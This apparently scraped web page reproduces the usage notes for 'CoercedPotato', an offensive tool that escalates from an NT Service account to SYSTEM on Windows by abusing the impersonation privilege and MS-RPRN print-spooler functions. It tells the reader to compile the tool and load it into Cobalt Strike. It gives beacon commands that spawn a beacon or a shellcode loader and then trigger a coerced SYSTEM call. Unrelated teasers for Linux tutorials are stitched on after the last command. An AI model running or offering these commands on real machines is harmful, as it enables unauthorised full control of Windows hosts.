Privilege escalation from NT Service to SYSTEM using SeImpersonateToken privilege and MS-RPRN functions.
Reflective Loader from
Clone this repo and compile the project in VisualStudio then load dist/coercedpotato.cna into CobaltStrike.
You first need to spawn the RPC listener with
beacon> CoercedPotato spawn ProcessToSpawn OptionalCmdArgument for example
beacon> CoercedPotato spawn C:\Windows\Temp\beacon.exe
beacon> CoercedPotato spawn C:\Windows\Temp\loader.exe C:\Windows\Temp\beacon.bin then you can trigger a SYSTEM call
beacon> CoercedPotato coerce If you need secure remote desktop access on Linux, learning how to Install TeamViewer on…
If you want to test operating systems, build development labs, or safely run isolated environments,…
If you want to build JavaScript applications on Linux, learning how to Install Node.js Ubuntu…
Managing software sources is an essential part of maintaining a Linux system, and understanding APT…
Website malware is one of the biggest threats for website owners, bloggers, businesses, and WordPress…
If you want to Install Python on Ubuntu systems for development, automation, or scripting, Ubuntu…